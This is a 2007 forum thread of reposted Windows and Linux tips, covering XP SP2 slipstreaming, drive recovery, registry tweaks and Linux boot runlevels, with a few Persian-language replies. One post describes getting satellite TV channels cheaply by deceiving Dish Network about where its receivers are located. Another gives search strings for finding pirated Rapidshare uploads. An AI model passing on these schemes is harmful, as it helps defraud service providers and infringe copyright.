Master
29-04-07, 09:47
DarkLegacy's Guide to Slipstreaming Service Pack 2

Note: All images are hosted with ImageShack.

• This guide will allow you to sucsessfully install Service Pack 2 on the original (gold) code of Microsoft Windows XP.
• The version of Windows you have purchased/downloaded does not matter as far as slipstreaming (they're all the same anyway).

Things you need:
• Microsoft Windows XP (duh :P)
• Service Pack 2:

URL Only the registered members can see the link

• Windows XP Boot sector:

Only the registered members can see the link

• Nero Burning Rom (find it on SoD)

Step One

Insert the Microsoft Windows XP CD into your CD-ROM drive, and create a new folder on your hard-drive labelled "CD".

Copy all of the files from the Windows XP CD to the "CD" folder.




Step Two

Download Service Pack 2 and place it within the root of your hard-drive.
Ex: C:\ D:\ etc..



Step Three

Go to Start -> Run and type in "F:\WindowsXP-KB835935-SP2-ENU.exe -s:F:\CD" (depending on where you put the folder)

The actual command is -s:drive:\folder



Step Four

The Service Pack 2 updater will automatically slipstream Service Pack 2 into your "CD" folder.




Step Five

If you browse back to the CD folder, you'll notice that new folders and files appeared from the SP2 update. At this point, you can include any software you wish onto this CD, but make sure that the size of the folder does not exceed the media you are burning on. If you're not sure, a regular CD is 700 megabytes.



Step Six

Go to Start and Search for files and folders. Go to all files and folders, and type in "wpa.dbl". This is the activation file for your current installed version of XP. Make a copy of the file and paste it into your CD folder.



Step Seven

Open up Nero Smartstart, and click on the icon that looks like two people. This turns the program into "professional mode". Search for create a bootable CD. Click on it, and make sure that your settings agree with the following picture; also make sure that you downloaded the Windows XP boot sector.



Step Eight

Continue onto the next tab, and make sure that your settings agree with the picture:



Step Nine

In this step, you can label your CD whatever the hell you want. I recommend WXPSP2_EN.


Step Ten

Go to "new" and locate your CD folder. Drag all of the files in the CD folder to the compilation window on the right, and nero will calculate how much disk space was used. If it exceeds 700 MB, get rid of some programs that you added to the CD. If you didn't add anything; just push burn.


Step Eleven

Make sure that your settings check with the picture:



Step Twelve

Just push burn, and that's it! Congradulations, you just made a bootable Win XP CD with SP2 slipstreamed!

Master
29-04-07, 09:48
Hard drive gone bad

The most common problems originate
from corruption of the master boot record, FAT, or directory.
Those are soft problems which can usually be taken care of
with a combination of tools like Fdisk /mbr to refresh the
master boot record followed by a reboot and Norton disk doctor
or Spinneret.

The most common hardware problems are a bad controller, a bad
drive motor, or a bad head mechanism.

1. Can the BIOS see and identify the hard drive correctly? If
it can't, then the hard drives onboard controller is bad.

2. Does the drive spin and maintain a constant velocity? If it
does, that's good news. The motor is functioning.

3. If the drive surges and dies, the most likely cause is a
bad controller (assuming the drive is cool). A gate allowing
the current to drive the motor may not be staying open. The
drive needs a new controller.

4. Do you hear a lot of head clatter when the machine is
turned on and initialized (but before the system attempts to
access the hard drive). Head clatter would indicate that the
spindle bearings are sloppy or worn badly. Maybe even lose and
flopping around inside.

5. There is always the possibility that the controller you are
using in the machine has gone south.

1. If the drive spins, try booting to the A> prompt, run Fdisk
and check to see if Fdisk can see a partition on the hard
drive. If Fdisk can see the partition, that means that it can
access the drive and that the controller electronics are
functioning correctly. If there is no head clatter, it may be
just a matter of disk corruption which commonly occurs when a
surge hits you machine and overwhelms the power supply voltage
regulator. It commonly over whelms the system electronics
allowing an EM pulse to wipe out the master boot record, file
allocations table, and primary directory. Fdisk can fix the
master boot record and Norton Disk Doctor can restore the FAT
and Directory from the secondaries.
2. The drive spins but Fdisk can't see it. Try the drive in
another system and repeat the test to confirm that Fdisk can't
read through the drives onboard controller. If it sees it in
another system, then your machines hard drive interface is
bad. You can try an upgraded or replacement controller card
like a Promise or CMD Technologies (there are others) in you
machine after disabling the integrated controller in the BIOS,
but if the integrated controller went south, it may just be
symptomatic of further failures and you'd be wise to replace
the motherboard. Trying the drive in another machine also
eliminates the variable that your machines 12 volt power
output being bad

3. If you get head clatter but a constant velocity on the
drive motor (no surging), you might try sticking the hard
drive in the freezer for about 12 hours. This is an old trick
from back in the days of the MFM/ESDI driver era. This can
cause the drive components to shrink enough to make the track
marker align with the tracks. We don't see that kind of
platter spindle wear much anymore, but back in the old days,
the balancing and bearings weren't as good. Still, under the
right circumstances, it might help. It would depend on how old
the drive is and how many hours of wear have occurred. You
have to be quick to get your info off the drive when it works.
Back then, the drives were much smaller, so there wasn't so
much to copy. So, go after the important data first.

4. The drive doesn't spin. Either the onboard controller is
bad or the motor is bad (assuming you did try the drive in
another machine). It's time to hit the net and local
independent shops to see if you can locate another drive of
the same make and model that's good. Since the drive is
probably an older drive and no longer in distribution, your
best bet is to find an identical used drive. If you know
someone with the same make and model, you might be wise to try
and persuade them to sell you their drive with an offer of
providing them with a free upgraded drive. If you can locate
an identical drive, start with the controller replacement ...
this is the simplest and least invasive. If swapping the
controller doesn't produce the desire result, you can tear
into the drive and swap the motors. While you have both drive
opened up to accomplish this, scrutinize the platters, heads
and armatures. You might even hook the drive up and power it
from a system with both drives attached. This way, you could
see anything that deviates between the actions of both drives
when they are initialized. Swapping patters is unlikely to
produce any positive result. They are a balanced system like
the tires on your car and I suspect that the balance will be
different for each drive as will other variables.

5. There's always Ontrack Corp. who will attempt to recoup
your info starting at $500 and going up from there. They don't
fix and return the drive either.

If the info is all that important to you, I would seek some
professional and experience technician in your locality who
makes his living from servicing and building computer systems
... not just selling them. If you have had much experience
salvaging information from bad hard drives, your likelihood of
success is low. In the case of soft corruption, all utilities
have their eccentricities. Often times, Norton Disk Doctor
will go too far (if you let it). It's wise to just let those
utilities small steps and then have a look at the drive and
see if you can copy it off. Norton will go so far as to rename
directories and files, and even delete them or break them up
into fragments which are useless.
_________________

Master
29-04-07, 09:48
The best firewall is a hardware firewall that is completely separate from your operating system. It need not be a dedicated router, could be an old pentium box running Linux. Below I have found some sites that have How To's on setting up an outside hardware router using an old computer and using a little linux program that fits on a single floppy disk.

Brief Description:
floppyfw is a router with the advanced firewall-capabilities in Linux that fits on one single floppy disc.

Features:
Access lists, IP-masquerading (Network Address Translation), connection tracked packet filtering and (quite) advanced routing. Package for traffic shaping is also available.
Requires only a 386sx or better with two network interface cards, a 1.44MB floppy drive and 12MByte of RAM ( for less than 12M and no FPU, use the 1.0 series, which will stay maintained. )
Very simple packaging system. Is used for editors, PPP, VPN, traffic shaping and whatever comes up. (now this is looking even more like LRP (may it rest in peace) but floppyfw is not a fork.)
Logging through klogd/syslogd, both local and remote.
Serial support for console over serial port.
DHCP server and DNS cache for internal networks.

floppyfw


h#tp://Only the registered members can see the link



Sentry Firewall CD-ROM is a Linux-based bootable CDROM suitable for use as an inexpensive and easy to maintain firewall, server, or IDS(Intrusion Detection System) Node. The system is designed to be immediately configurable for a variety of different operating environments via a configuration file located on a floppy disk, a local hard drive, and/or a network via HTTP(S), FTP, SFTP, or SCP.

The Sentry Firewall CD is a complete Linux system that runs off of an initial ramdisk, much like a floppy-based system, and a CD. The default kernel is a current 2.4.x series kernel with various Netfilter patches applied. An OpenWall-patched current 2.2.x kernel is also available on the CD.

Booting from the CDROM is a fairly familiar process. The BIOS execs the bootloader(Syslinux) - which then displays a bootprompt and loads the kernel and ramdisk into memory. Once the kernel is running, the ramdisk is then mounted as root(/). At this point our configuration scripts are run(written in perl) that configure the rest of the system. It is the job of these configure scripts to put the various startup and system files into the proper location using either what is declared in the configuration file(sentry.conf) or the system defaults located in the /etc/default directory.

Most of the critical files used at boot time can be replaced with your own copy when declared in the configuration file. This is essentially how we allow the user to configure the system using his/her own configuration and init files.

All of the binaries, files, scripts, etc, used to create the CD-ROM are also available on the CD-ROM. So, with a little practice, you can easily build and customize your own bootable Sentry Firewall CD. Please see the HOWTO for more details.


Sentry Firewall


ht*p://Only the registered members can see the link

Master
29-04-07, 09:49
Have Notepad In Send To



Many apply a registry tweak to have notepad as an option for unknown file types. We frequently see such files which are actually just text, but named with some odd file-extension. And then, some suspicious files which we want to make sure what the contents are. Well, in such cases where the registry tweak is applied, the downside happens to be that even some known files get associated with notepad - but no, all we want is to be able to open a file with notepad - the association part in such cases is unwanted interference. Also, notepad becomes a permanent fixture on the right-click menu - which is again an annoyance.

So what we do, is to have notepad as an option in the Send-To options, of the right-click menu in explorer. It fulfils the purpose to perfection (atleast, in my case). Here's what we do:

1. right-click desktop, choose "New >> Shortcut"
2. Type the location of the item - "notepad" - (that's all, no need to give path)
3. Next >> type name for shortcut - "Edit with Notepad"
4. Click finish
5. Now right-click this shortcut on the desktop, and choose properties.
6. Confirm that the "target" and "start in" fields are using variables - "%windir%\system32\notepad.exe" - (absolute paths will be problematic if you use this .LNK on machines other than your own)
7. Now, browse to "%UserProfile%\SendTo" in explorer (which means "C:\Documents and Settings\User_Name\SendTo\" folder)
8. And copy the "Edit with Notepad.lnk" file which you already created, to that folder.
9. So now, you can right-click on ANY file-type, and be offered an option to open with notepad, from the SendTo sub-menu.

So now, you just right-click on an .nfo or .eml or .diz file (which are associated with other programs, and are sometimes just plain-text files), and choose "Send To >> Edit with Notepad" and it will open in notepad!
No more botheration of applying registry tweaks for something as simple as this.

Master
29-04-07, 09:49
have satallite tv for almost free IF not free!!!

this is a tut by me that i use at home to get all the channels "not including ppv" for almost free if not free... i have every single channel that dish network offers and i dont pay a single dollar..... ok this is how it goes...
-----------------------------------

Get a dish 500 no matter how… “buy /steal”
Sign up with dish network for like “top 100” that will give you like 100 channels… it would cost you like 29.99 or 39.99 not sure…
Then you need to find 3 friends… or parent friends that are interested in having satellite TV….
Dish network allows you to have up to 4 receivers in one house with no prob.
So the next day, or when ever you find a person or 3 of them… call the dish company and tell them that you would like to activate your 2nd receiver and would like to add some additional channels… for that you would need “receiver # and smart card # of that new receiver that is at your friends house” so you give them the info and they hook the second receiver up… just don’t tell them that the receiver is not in the house…
They will hook up to 3 more receivers per account and when you get all 4 receivers you can get all channels on them and just split your bill between the other 3 people that are using your subscription…
For me it works perfectly… I live in Oregon and I have a receiver in my friends’ house in Washington and two in California USA.
I don’t know if this thing would work anywhere else but it sure works for me

Master
29-04-07, 09:50
First go to Only the registered members can see the link to learn binary.

OK, 1,453,752 is 101100010111010111000 is binary, now we turn it into a Hex number.

First Hex numbers goes like this:
1=1
2=2
.
.
9=9
10=A
11=B
12=C
13=D
14=E
15=F

Now you need to take the first octet (the far right 4) and place it under this little grid:

8 4 2 1
--------
1 0 0 0 = 8

See the 1 under the 8 column?
That is what you add.

So the next octet is 1011, put it under the grid:

8 4 2 1
--------
1 0 0 0 = 8
1 0 1 1 = B

See 8+2+1=11, so you can't just say 11 you have to put it in a Hex number, which is B.
So the full Hex number of 1,453,752 is:

8 4 2 1
--------
1 0 0 0 = 8
1 0 1 1 = B
1 1 1 0 = E
0 0 1 0 = 2
0 1 1 0 = 6
0 0 0 1 = 1 <-- Just add zero if it isn't a full octet

162EB8

So if you want to turn a number in to the shorter version of Hex, just turn it into binary, then use this grid and you'll do fine



P.S. Thanks Korrupt for the number to work with

Master
29-04-07, 09:52
Hide Drives and Partitions

Do you have data on a partition or hard drive that you don't want tampered with or easily accessible to other users? Well, you can hide any drive/partition in Windows XP, NT, and 2000. That means that they won't show up in Explorer or My Computer.

If you want access to that drive from your user account you should create a desktop shortcut before proceeding. Once hidden, you can still access by typing the drive letter and a colon in Start/Run—for example, "D:" will bring up a folder of the contents on your D drive.

The easiest way with Win XP is to use the TweakUI power toy from Mcft. Go to Start/Run and type in "tweakui" (without the quotes).

Go to My Computer/Drives and uncheck the drive/partition(s) you want hidden. Click "Apply" or "OK" when finished.

If you have XP but not Tweak UI you can download it here...
Only the registered members can see the link

For Win NT, 2000, and XP you can use the following Registry edit:

*Be sure to back up the Registry before proceeding
Only the registered members can see the link

Open the Registry Editor by going to Start/Run and typing in "regedit" (without the quotes). Find your way to...

HKEY_CURRENT_USER\Software\Mcft\Windows\CurrentVer sion\Policies

Click on "Explorer".

Double-click the "NoDrives" key in the right column. If you don't find a "NoDrives" registry key, just right-click in the right pane and choose "New/DWORD Value" then name the key "NoDrives".

You'll see a value like "0000 00 00 00 00". This is where the fun starts. The four sets of double zeros (after the "0000") are where you'll enter the values for the drive/partitions. Now, stay with me on this—it's not as complicated as it sounds:

The first column is for drives A-H, the second for I-P, the third for Q-X, and the fourth for Y-Z.

The values for each drive are as follows:

1 - A I Q Y
2 - B J R Z
4 - C K S
8 - D L T
16 - E M U
32 - F N V
64 - G O W
80 - H P X

So, let's say you want to hide drive D. In the first column you would put "08". For drive K you would put "04" in the second column.

But what if you want to hide more than one drive in a column? Simply add the values together: D+E = 8+16 = 24. So in the first column you would put "24".

Still baffled? If you have XP then go get TweakUI and save yourself the math.

Whichever method you use, you can rest easy knowing that the files on that drive or partition are less accessible to other users.

Master
29-04-07, 09:52
How 2 Find EVERYTHING uploaded on Rapidshare

All rapidshare.de Downloads:
/Only the registered members can see the link*+site%3Arapidshare.de

Apps Rapidshare.de Downloads:
/Only the registered members can see the link e&btnG=Search

Movies rapidshare.de Downloads:
/Only the registered members can see the link

Master
29-04-07, 09:53
How do I overburn a CD with Nero?

Start Nero

From the action-bar select File and select Preferences.



In the Preferences window, select Expert Features(1) and check the Enable overburn disc-at-once(2).



Choose a Maximum CD Length(3) and click OK(4) (*82:59:59 is the maximum value I suggest, but as you can see from the screen capture above I have set mine significantly higher. The reason is because I frequently use 99min 850 MB CD media).

For a more accurate test you can use a nero tool called nero speed test to see how much a specific CD is capable of being overburned . get it here

From the action-bar select File and select Write CD.



A window will appear when you have exceeded expected length, click OK to start the overburn copy.

Remember to set disk to burn Disc at Once, you cannot overburn in Track at Once Mode.

Master
29-04-07, 09:53
If you have more then one operating system installed or wish
to remove an operating system from the boot menu, you can use the following information.

1.Click on Start, Control Panel, System, Advanced.
2.Under Startup and Recovery, click Settings.
3.Under Default Operating System, choose one of the following:

"Microsoft Windows XP Professional /fastdetect"
-or-
"Microsoft Windows XP Home /fasdetect"
-or-
"Microsoft Windows 2000 Professional /fastdetect"

4.Take the checkmark out of the box for "Time to display a list of Operating Systems".
5.Click Apply and Ok, and reboot the system.

*If you wish to edit the boot.ini file manually, click on the button "EDIT"

Master
29-04-07, 09:54
How do I Test My VirusScan Installation? (Eicar)

Description

After installing VirusScan, you may logically wonder, how do I know if it's working? The answer is a test virus. The EICAR Standard AntiVirus Test File is a combined effort by anti-virus vendors throughout the world to implement one standard by which customers can verify their anti-virus installations.

Solution

To test your installation, copy the following line into its own file, then save the file with the name EICAR.COM. More detailed instructions are found below.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

The file size will be 68 or 70 bytes.

If VirusScan is running and configured correctly, when you try to save the file, VirusScan will detect the virus. If VirusScan is not running, start it and scan the directory that contains EICAR.COM. When your software scans this file, it will report finding the EICAR test file.

Note that this file is NOT A VIRUS. Delete the file when you have finished testing your installation to avoid alarming unsuspecting
users.

The eicar test virus is available for download from the following website:
Only the registered members can see the link

Creating Eicar.com

1. Click on Start.
2. Select Run.
3. In the Open box type: notepad
4. Maximize the window.
5. Highlight the following on the following line of text:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
6. Right click on the highlighted text and choose 'copy'.
7. Switch back to Notepad.
8. Right click anywhere inside of Notepad and select 'paste'.
9. Click the File menu and select 'save as'.
10. Change the 'Save as Type' to 'all files'.
11. Name the file eicar.com.

Master
29-04-07, 09:55
Simple and useful tip
******************
at command prompt just type
dir /ah
if the list is too long u can use
dir /ah/p/w
*******************

Shahryar
29-04-07, 14:20
ممنون مستر جان مقالاتش جالب هست ...

اما فقط یک لطفی در حق من بکن و اینکه بیا و اون ها را توی Code قرار نده چراکه مرورگر فایرفاکس من به دلیلی نمیتونم روش FireBug را نصب کنم و قالب مشکل پیدا میکنه ( متاسفانه قالب وی بالتین با فقط IE چک شده و اپرا ) .

ممنون میشم...

در مورد ترجمه که فعلا فکر نکنم بشه ولی PDF میتونم بکنیم تا تابستون که یکم سرمون خلوت تر بشه شروع کنیم ترجمه ...

قربانت شهریار

Shahryar
29-04-07, 14:26
آقا این که ماله پیدا کردن فایل هایی که روی رپید شیر آپلود شده خیلی فوق العاده بود !

ممنون
شهریار

Master
29-04-07, 18:38
شهریار جان من خودم فایر فاكس دارم .و مشكلی از این جهت ندارم .نمیدونم مشكل شما چیه ؟اگه من اینو تو كد قرار ندم .اولا تو بعضی پستها آدرس بعضی وب سایتهاست كه نباید بهش لینك مستقیم داده بشه بعد ها برای كل فورم مشكل پیش میاد... این از اولین دلیل
دلیل دوم اینكه به نوعی فرنت و صفحه و اینا زیبا نمیشه ... و یه جوری شلم شوروا در میاد ..
بهع ه رحال شما بازم تلاش كن ..(با اینترنت اكسپلورر و فایر فاكسو اپرا چك كردم .. )بهترین ظاهر درنهایت زیباییو شیكی وكارایی تو فایر فاكس نمود داره ... نمیدونم چرا مشكل دارید ؟
بیشتر توضیح بده .. تا بتونم كمكت كنم ...

د رمورد پی دی اف هم بسیار عالیه ...هر چه زودتر این كار صورت بگیره بهتره ..چون اولین جایی هست كه این كارو دارم بصورت گسترده انجام میدم ...
موفق و كامیار باشید
سید حسین

Shahryar
29-04-07, 18:57
قطعا این کار را هر چه سریعتر انجام میدم چراکه هم مطالب را میتونیم استفاده و بهره برداری کنیم ( کپی رایت با نام شما و کلا تیم شهر سخت افزار بزنیم و هم اینکه کلا راحتی را میتونیم برای بچه ها فراهم آوریم ...)

ولی واقعا مطالبی که گذاشتی فوق العاده هست ...

قربانت شهریار

Master
30-04-07, 04:38
How Linux boots

As it turns out, there isn't much to the boot process:

1. A boot loader finds the kernel image on the disk, loads it into memory, and starts it.
2. The kernel initializes the devices and its drivers.
3. The kernel mounts the root filesystem.
4. The kernel starts a program called init.
5. init sets the rest of the processes in motion.
6. The last processes that init starts as part of the boot sequence allow you to log in.

Identifying each stage of the boot process is invaluable in fixing boot problems and understanding the system as a whole. To start, zero in on the boot loader, which is the initial screen or prompt you get after the computer does its power-on self-test, asking which operating system to run. After you make a choice, the boot loader runs the Linux kernel, handing control of the system to the kernel.

There is a detailed discussion of the kernel elsewhere in this book from which this article is excerpted. This article covers the kernel initialization stage, the stage when the kernel prints a bunch of messages about the hardware present on the system. The kernel starts init just after it displays a message proclaiming that the kernel has mounted the root filesystem:

VFS: Mounted root (ext2 filesystem) readonly.

Soon after, you will see a message about init starting, followed by system service startup messages, and finally you get a login prompt of some sort.

NOTE On Red Hat Linux, the init note is especially obvious, because it "welcomes" you to "Red Hat Linux." All messages thereafter show success or failure in brackets at the right-hand side of the screen.

Most of this chapter deals with init, because it is the part of the boot sequence where you have the most control.
init

There is nothing special about init. It is a program just like any other on the Linux system, and you'll find it in /sbin along with other system binaries. The main purpose of init is to start and stop other programs in a particular sequence. All you have to know is how this sequence works.

There are a few different variations, but most Linux distributions use the System V style discussed here. Some distributions use a simpler version that resembles the BSD init, but you are unlikely to encounter this.

Runlevels

At any given time on a Linux system, a certain base set of processes is running. This state of the machine is called its runlevel, and it is denoted with a number from 0 through 6. The system spends most of its time in a single runlevel. However, when you shut the machine down, init switches to a different runlevel in order to terminate the system services in an orderly fashion and to tell the kernel to stop. Yet another runlevel is for single-user mode, discussed later.

The easiest way to get a handle on runlevels is to examine the init configuration file, /etc/inittab. Look for a line like the following:

id:5:initdefault:

This line means that the default runlevel on the system is 5. All lines in the inittab file take this form, with four fields separated by colons occurring in the following order:
# A unique identifier (a short string, such as id in the preceding example)
# The applicable runlevel number(s)
# The action that init should take (in the preceding example, the action is to set the default runlevel to 5)
# A command to execute (optional)

There is no command to execute in the preceding initdefault example because a command doesn't make sense in the context of setting the default runlevel. Look a little further down in inittab, until you see a line like this:

l5:5:wait:/etc/rc.d/rc 5

This line triggers most of the system configuration and services through the rc*.d and init.d directories. You can see that init is set to execute a command called /etc/rc.d/rc 5 when in runlevel 5. The wait action tells when and how init runs the command: run rc 5 once when entering runlevel 5, and then wait for this command to finish before doing anything else.

There are several different actions in addition to initdefault and wait, especially pertaining to power management, and the inittab(5) manual page tells you all about them. The ones that you're most likely to encounter are explained in the following sections.

respawn

The respawn action causes init to run the command that follows, and if the command finishes executing, to run it again. You're likely to see something similar to this line in your inittab file:

1:2345:respawn:/sbin/mingetty tty1

The getty programs provide login prompts. The preceding line is for the first virtual console (/dev/tty1), the one you see when you press ALT-F1 or CONTROL-ALT-F1. The respawn action brings the login prompt back after you log out.

ctrlaltdel

The ctrlaltdel action controls what the system does when you press CONTROL-ALT-DELETE on a virtual console. On most systems, this is some sort of reboot command using the shutdown command.

sysinit

The sysinit action is the very first thing that init should run when it starts up, before entering any runlevels.

How processes in runlevels start

You are now ready to learn how init starts the system services, just before it lets you log in. Recall this inittab line from earlier:

l5:5:wait:/etc/rc.d/rc 5

This small line triggers many other programs. rc stands for run commands, and you will hear people refer to the commands as scripts, programs, or services. So, where are these commands, anyway?

For runlevel 5, in this example, the commands are probably either in /etc/rc.d/rc5.d or /etc/rc5.d. Runlevel 1 uses rc1.d, runlevel 2 uses rc2.d, and so on. You might find the following items in the rc5.d directory:

S10sysklogd S20ppp S99gpm
S12kerneld S25netstd_nfs S99Only the registered members can see the link
S15netstd_init S30netstd_misc S99rmnologin
S18netbase S45pcmcia S99sshd
S20acct S89atd
S20logoutd S89cron

The rc 5 command starts programs in this runlevel directory by running the following commands:

S10sysklogd start
S12kerneld start
S15netstd_init start
S18netbase start
...
S99sshd start

Notice the start argument in each command. The S in a command name means that the command should run in start mode, and the number (00 through 99) determines where in the sequence rc starts the command.

The rc*.d commands are usually shell scripts that start programs in /sbin or /usr/sbin. Normally, you can figure out what one of the commands actually does by looking at the script with less or another pager program.

You can start one of these services by hand. For example, if you want to start the Only the registered members can see the link Web server program manually, run S99Only the registered members can see the link start. Similarly, if you ever need to kill one of the services when the machine is on, you can run the command in the rc*.d directory with the stop argument (S99Only the registered members can see the link stop, for instance).

Some rc*.d directories contain commands that start with K (for "kill," or stop mode). In this case, rc runs the command with the stop argument instead of start. You are most likely to encounter K commands in runlevels that shut the system down.

Adding and removing services

If you want to add, delete, or modify services in the rc*.d directories, you need to take a closer look at the files inside. A long listing reveals a structure like this:

lrwxrwxrwx . . . S10sysklogd -> ../init.d/sysklogd
lrwxrwxrwx . . . S12kerneld -> ../init.d/kerneld
lrwxrwxrwx . . . S15netstd_init -> ../init.d/netstd_init
lrwxrwxrwx . . . S18netbase -> ../init.d/netbase
...

The commands in an rc*.d directory are actually symbolic links to files in an init.d directory, usually in /etc or /etc/rc.d. Linux distributions contain these links so that they can use the same startup scripts for all runlevels. This convention is by no means a requirement, but it often makes organization a little easier.

To prevent one of the commands in the init.d directory from running in a particular runlevel, you might think of removing the symbolic link in the appropriate rc*.d directory. This does work, but if you make a mistake and ever need to put the link back in place, you might have trouble remembering the exact name of the link. Therefore, you shouldn't remove links in the rc*.d directories, but rather, add an underscore (_) to the beginning of the link name like this:

mv S99Only the registered members can see the link _S99Only the registered members can see the link

At boot time, rc ignores _S99Only the registered members can see the link because it doesn't start with S or K. Furthermore, the original name is still obvious, and you have quick access to the command if you're in a pinch and need to start it by hand.

To add a service, you must create a script like the others in the init.d directory and then make a symbolic link in the correct rc*.d directory. The easiest way to write a script is to examine the scripts already in init.d, make a copy of one that you understand, and modify the copy.

When adding a service, make sure that you choose an appropriate place in the boot sequence to start the service. If the service starts too soon, it may not work, due to a dependency on some other service. For non-essential services, most systems administrators prefer numbers in the 90s, after most of the services that came with the system.

Linux distributions usually come with a command to enable and disable services in the rc*.d directories. For example, in Debian, the command is update-rc.d, and in Red Hat Linux, the command is chkconfig. Graphical user interfaces are also available. Using these programs helps keep the startup directories consistent and helps with upgrades.

HINT: One of the most common Linux installation problems is an improperly configured XFree86 server that flicks on and off, making the system unusable on console. To stop this behavior, boot into single-user mode and alter your runlevel or runlevel services. Look for something containing xdm, gdm, or kdm in your rc*.d directories, or your /etc/inittab.

Controlling init

Occasionally, you need to give init a little kick to tell it to switch runlevels, to re-read the inittab file, or just to shut down the system. Because init is always the first process on a system, its process ID is always 1.

You can control init with telinit. For example, if you want to switch to runlevel 3, use this command:

telinit 3

When switching runlevels, init tries to kill off any processes that aren't in the inittab file for the new runlevel. Therefore, you should be careful about changing runlevels.

When you need to add or remove respawning jobs or make any other change to the inittab file, you must tell init about the change and cause it to re-read the file. Some people use kill -HUP 1 to tell init to do this. This traditional method works on most versions of Unix, as long as you type it correctly. However, you can also run this telinit command:

telinit q

You can also use telinit s to switch to single-user mode.

Shutting down

init also controls how the system shuts down and reboots. The proper way to shut down a Linux machine is to use the shutdown command.

There are two basic ways to use shutdown. If you halt the system, it shuts the machine down and keeps it down. To make the machine halt immediately, use this command:

shutdown -h now

On most modern machines with reasonably recent versions of Linux, a halt cuts the power to the machine. You can also reboot the machine. For a reboot, use -r instead of -h.

The shutdown process takes several seconds. You should never reset or power off a machine during this stage.

In the preceding example, now is the time to shut down. This argument is mandatory, but there are many ways of specifying it. If you want the machine to go down sometime in the future, one way is to use +n, where n is the number of minutes shutdown should wait before doing its work. For other options, look at the shutdown(8) manual page.

To make the system reboot in 10 minutes, run this command:

shutdown -r +10

On Linux, shutdown notifies anyone logged on that the machine is going down, but it does little real work. If you specify a time other than now, shutdown creates a file called /etc/nologin. When this file is present, the system prohibits logins by anyone except the superuser.

When system shutdown time finally arrives, shutdown tells init to switch to runlevel 0 for a halt and runlevel 6 for a reboot. When init enters runlevel 0 or 6, all of the following takes place, which you can verify by looking at the scripts inside rc0.d and rc6.d:

1. init kills every process that it can (as it would when switching to any other runlevel).

# The initial rc0.d/rc6.d commands run, locking system files into place and making other preparations for shutdown.
# The next rc0.d/rc6.d commands unmount all filesystems other than the root.
# Further rc0.d/rc6.d commands remount the root filesystem read-only.
# Still more rc0.d/rc6.d commands write all buffered data out to the filesystem with the sync program.
# The final rc0.d/rc6.d commands tell the kernel to reboot or stop with the reboot, halt, or poweroff program.

The reboot and halt programs behave differently for each runlevel, potentially causing confusion. By default, these programs call shutdown with the -r or -h options, but if the system is already at the halt or reboot runlevel, the programs tell the kernel to shut itself off immediately. If you really want to shut your machine down in a hurry (disregarding any possible damage from a disorderly shutdown), use the -f option.

Master
30-04-07, 04:39
How Long Has Your System Been Running?

Here's how you verify system uptime:

Click Start | Run and type cmd to open a command prompt.
At the prompt, type systeminfo

Scroll down the list of information to the line that says System Up Time.

This will tell you in days, hours, minutes and seconds how long the system has been up.

Note that this command only works in XP Pro, not in XP Home. You can, however, type net statistics workstation at the prompt in Home. The first line will tell you the day and time that the system came online.

Master
30-04-07, 04:40
How To Access Your Folders From Your Taskbar

This is an easy way to get to the folders on your system without having to open a Windows Explorer Window every time you want to access files. I find it very useful to have this feature as it allows me to access my Folders and Drives immediately and saves me a lot of time.

This works in Windows XP:

1. Right Click an empty spot on your Taskbar (Between your Start Button and your System Tray).
2. Click Toolbars.
3. Click New Toolbar.
4. A Small Window will Open that allows you to pick the folder you wish to make a Toolbar. If you want to access your Desktop Without having to minimize all your windows. Just Pick Desktop. If you want to access ONLY your My Documents Folder, Select that. Any folder will work for this.
5. Click OK.
The New Tool bar will appear at the bottom of your screen next to your System Tray.

If you find this to be not useful, Repeat Steps 1 and 2 and then check click the Toolbar you created that has a check mark next to it. And it will disappear.

Master
30-04-07, 04:40
You can add an Internet URL address bar to your Windows XP taskbar. Doing so will let you type in URLs and launch Web pages without first launching a browser. It will also let you launch some native Windows XP applications in much the same way as you would via the Run menu (so you could type in calc to launch the calculator or mspaint to launch Microsoft Paint. Here's how you add the address bar:

1. Right-click on the taskbar, select Toolbars, and then click Address.

2. The word Address will appear on your taskbar.

3. Double click it to access it.

4. If that doesn't work, your taskbar is locked. You can unlock it by right-clicking on the taskbar again and uncheck Lock the Taskbar.

NOTE: You may also need to grab the vertical dotted lines beside the word Address and drag it to the left to make the Address window appear.

Master
30-04-07, 04:41
How to Add an Option to Print the Contents of a Folder

Would you like to be able to right click any folder in Explorer and print its contents? You can add this option to the context menu by following these steps:

First, you need to create a batch file called Printdir.bat. Open Notepad or another text editor and type (or cut and paste) this text:

@echo off
dir %1 /-p /o:gn > "%temp%\Listing"
start /w notepad /p "%temp%\Listing"
del "%temp%\Listing"
exit

Now, in the Save As dialog box, type "%windir%\Printdir.bat" (without the quotation marks) and click the Save button.
Click Start, Control Panel, Folder Options.
Click the File Types tab, and then click File Folder.
Click the Advanced button.
Click the New button.

In the Action box, type "Print Directory Listing" (without the quotation marks).

In the Application used to perform action box, type "Printdir.bat" (without the quotation marks).

Click OK in all three dialog boxes to close the dialog boxes.

You're not quite finished yet! Now you need to edit the Registry, so open your favorite Registry Editor.

Navigate to HKEY CLASSES ROOT\Directory\shell.

Right click on "default" and select Modify.
In the File Data box, type "none" (without the quotation marks).

Click OK and close the Registry Editor.

Now when you right click a folder, you'll see the option to Print Directory Listing. Selecting it will print the contents of the folder.

Who needs a stinking program to print a folder directory?

Master
30-04-07, 04:41
re you sick of seeing the same tips again and again when you first logon to Windows? Now you can change them to whatever you want, whether it's quotes, jokes or a to-do list, anything is possible.

Open your registry and find the key below.

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Explorer\ Tips

Create a new string valued named by incrementing the existing value names and set it to the required tip text.

eg. 32 - Dont forget to Visit ShareOrDie.com

Master
30-04-07, 04:42
Before you edit the registry, export the keys in the registry that you plan to edit, or back up the whole registry. If a problem occurs, you can then follow the steps how-to restore the registry to its previous state.


How to Export Registry Keys

Click Start, and then click Run.

In the Open box, type regedit, and then click OK.

On the File menu, click Export.

In the Save in box, select the boxs at the bottom the bottom according to weather you want to export all or only selected branches of the registry.

Next select a location in which to save the backup .reg file. In the File name box, type a file name, and then click Save.


How to Restore the Registry

To restore registry keys that you exported, double-click the .reg file that you saved.

Master
30-04-07, 04:43
Hi guys...here I found a tutorial of another Foum:
INFO: Text didn't write by me!


